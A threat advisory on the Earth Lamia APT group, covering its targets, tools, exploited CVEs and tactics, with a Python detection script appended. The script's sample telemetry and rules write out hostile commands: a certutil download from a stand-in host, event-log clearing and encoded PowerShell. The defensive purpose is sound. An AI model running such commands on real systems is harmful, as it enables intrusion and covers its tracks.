Earth Lamia Expands Arsenal to Target Multiple Industries in 2025

Earth Lamia, a China-nexus APT group, has been actively targeting industries in Brazil, India, and Southeast Asia since 2023. The actor has evolved its focus over time – from financial services to logistics, retail, IT, and public institutions – using customized tools and advanced techniques. Its arsenal includes a novel backdoor named PULSEPACK, modified open-source tools, and widespread exploitation of web-facing application vulnerabilities.

Severity Level: High

Threat Details

1. Targeted Regions: Brazil, India, Thailand, Vietnam, Indonesia, Malaysia, Philippines

2. Targeted Industries (by Timeline):

Period              | Primary Target Industries
2023 – Early 2024   | Financial Services (Securities, Brokerage)
Mid 2024            | Logistics, Online Retail
Late 2024 – 2025    | IT, Education, Government

3. Custom Tools and Malware

  • PULSEPACK (.NET modular backdoor)
    Plugin-based architecture; communicates via TCP (2024) and WebSocket (2025)
    Uses AES encryption, memory injection, and reflective loading
  • BypassBoss: Modified from “Sharp4PrinterNotifyPotato”; used for privilege escalation
  • Cobalt Strike & Brute Ratel: Used with custom loaders and encrypted shellcode
  • VShell Loader: Also uses the open-source tool VOIDMAW for in-memory evasion
  • DLL sideloading: Leveraging legitimate binaries (e.g., AppLaunch.exe) to load malware

4. Exploited Vulnerabilities

Earth Lamia aggressively scans for and exploits the following public-facing software to gain initial access:

CVE-ID                 | Affected Software              | Vulnerability Type
CVE-2017-9805          | Apache Struts2                 | Remote Code Execution (RCE)
CVE-2021-22205         | GitLab                         | RCE via improper image validation
CVE-2024-9047          | WordPress Plugin               | Arbitrary File Access
CVE-2024-27198/99      | JetBrains TeamCity             | Auth Bypass / Path Traversal
CVE-2024-51378/567     | CyberPanel                     | RCE
CVE-2024-56145         | Craft CMS                      | RCE
CVE-2025-31324         | SAP NetWeaver Visual Composer  | File Upload RCE (Unauthenticated)

5. Execution

  • Runs post-exploitation scripts via certutil.exe / powershell.exe to download additional tools
  • Deploys the custom backdoor (PULSEPACK)
  • Leverages legitimate binaries (e.g., AppLaunch.exe) to sideload malware

6. Persistence

  • Creates new user accounts (e.g., sysadmin123, helpdesk); schedules tasks (schtasks.exe) using the TKRun.dll plugin from PULSEPACK
  • Maintains persistence through modified DLLs, registry modifications, and hidden startup mechanisms

7. Privilege Escalation

  • Tools used: GodPotato, JuicyPotato, BypassBoss
  • Local admin rights leveraged to escalate to SYSTEM, extract credentials, and control domain environments

8. Lateral Movement

  • Uses stolen credentials or dropped tools to move inside the network
  • Techniques: LSASS memory dumping to extract hashes, SAM and SYSTEM hive extraction, network scanning (with Fscan, Kscan), proxy tunneling with Stowaway and Rakshasa

9. Defense Evasion: Cleaning Windows Application, System and Security event logs with “wevtutil.exe”

Recommendations:

  1. Ensure Apache Struts2, GitLab, WordPress Plugin, JetBrains TeamCity, CyberPanel, Craft CMS, SAP NetWeaver Visual Composer are updated with the latest security patches.
  2. Audit and remove suspicious accounts like sysadmin123 or helpdesk.
  3. Alert on log clearing commands: wevtutil.exe cl System / Security / Application
  4. Disable vulnerable services where possible (e.g., unused IIS, Apache modules).
  5. Detect encoded/in-memory PowerShell usage: powershell.exe -enc, Invoke-Expression, DownloadFile
  6. Detect suspicious command execution like certutil.exe downloading files or cmd.exe /c used by non-interactive users
  7. Detect execution of legitimate binaries (AppLaunch.exe) loading non-standard DLLs (mscoree.dll, etc.) from user-controlled paths
  8. Detect access to lsass.exe via tools like procdump, mimikatz, or suspicious use of taskmgr by non-admin users
  9. Monitor file drops of suspicious DLLs (Voidmaw, encoded shellcode), especially in %Public%, %Temp%, or %AppData% paths
  10. Block the IOCs at their respective controls
    https://www.virustotal.com/gui/collection/c26546383a7a1bd685dad3238123a1b8186c694ee11c07f6fa6daf84cbb9b96b/iocs
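As an added example (not part of this advisory or the Trend Micro report), the following Python sketch turns recommendations 3, 5, 6, 7 and 8 into rules over simplified Sysmon-style process-creation and image-load records; the event format, rule names and sample telemetry are constructed for illustration.

```python
"""Constructed detection rules for the TTPs in this advisory (example code, not Trend Micro's)."""
import re
from dataclasses import dataclass

@dataclass
class Event:
    kind: str    # "process" (process creation) or "imageload" (DLL load)
    image: str   # executing binary
    detail: str  # command line for "process", loaded DLL path for "imageload"
# Patterns follow recommendations 3, 5, 6, 7 and 8 above.
LOG_CLEAR = re.compile(r"\bcl\s+(system|security|application)\b", re.I)
SUSPICIOUS_PS = re.compile(r"(\s-e(nc|ncodedcommand)?\s|Invoke-Expression|DownloadFile)", re.I)
URL = re.compile(r"https?://", re.I)
USER_WRITABLE = re.compile(r"\\(Users\\Public|Temp|AppData)\\", re.I)
SIDELOAD_HOSTS = {"applaunch.exe"}  # legitimate binaries the actor abuses for sideloading

def classify(ev: Event) -> list[str]:
    """Return the names of every rule the event trips (empty list = nothing flagged)."""
    hits, name = [], ev.image.rsplit("\\", 1)[-1].lower()
    if ev.kind == "process":
        if name == "wevtutil.exe" and LOG_CLEAR.search(ev.detail):
            hits.append("event_log_cleared")
        if name == "powershell.exe" and SUSPICIOUS_PS.search(ev.detail):
            hits.append("encoded_or_download_powershell")
        if name == "certutil.exe" and URL.search(ev.detail):
            hits.append("certutil_download")
        if name.startswith("procdump") and "lsass" in ev.detail.lower():
            hits.append("lsass_access")
    elif ev.kind == "imageload":
        # Trusted host process pulling a DLL from a user-writable path: the sideloading pattern.
        if name in SIDELOAD_HOSTS and USER_WRITABLE.search(ev.detail):
            hits.append("dll_sideload")
    return hits

# Constructed sample telemetry (invented for this example, not real IoCs).
SAMPLE = [
    Event("process", r"C:\Windows\System32\wevtutil.exe", "wevtutil.exe cl Security"),
    Event("process", r"C:\Windows\System32\certutil.exe",
          r"certutil.exe -urlcache -f http://example.invalid/x.dat C:\Users\Public\x.dat"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -enc SQBFAFgA"),
    Event("imageload", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe",
          r"C:\Users\Public\mscoree.dll"),
    Event("process", r"C:\Windows\System32\notepad.exe", "notepad.exe report.txt"),
]

def triage(events: list[Event]) -> dict[str, list[str]]:
    """Map each flagged event's command line or DLL path to the rules it tripped."""
    return {ev.detail: hits for ev in events if (hits := classify(ev))}
```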

Source:

  • https://www.trendmicro.com/en_us/research/25/e/earth-lamia.html
